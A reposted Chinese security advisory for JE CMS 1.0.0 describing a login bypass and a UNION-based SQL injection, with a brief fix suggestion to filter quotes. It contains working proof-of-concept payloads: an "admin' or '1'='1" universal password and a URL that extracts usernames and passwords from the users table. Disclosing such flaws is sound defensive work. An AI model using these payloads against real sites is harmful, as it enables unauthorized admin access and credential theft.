日期:2010-10-01 01:12:00 来源:本站整理
JE CMS 1.0.0 万能密码登录与注入漏洞与修复[网络技术]
本文“JE CMS 1.0.0 万能密码登录与注入漏洞与修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
JE CMS <= 1.0.0程序呈现两处漏洞,一处在登录考证可以利用万能密码绕过.另一处是SQL注入漏洞.
1. Bypass Authentication by SQL Injection Vulnerability //登录考证漏洞
in administrator\login.php page, lines 16-20: //login.php页16-20行(代码省略)
POC:
in administrator/login.php
username: admin' or '1'='1
password: admin' or '1'='1
2. SQL injection in administrator\index.php on "userid" parameter: //SQL注入漏洞
in administrator\index.php file line 12:(代码省略)
POC:
http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--
安全防备:
严峻过滤
过滤变量 ' ' or 替换位空
以上是“JE CMS 1.0.0 万能密码登录与注入漏洞与修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论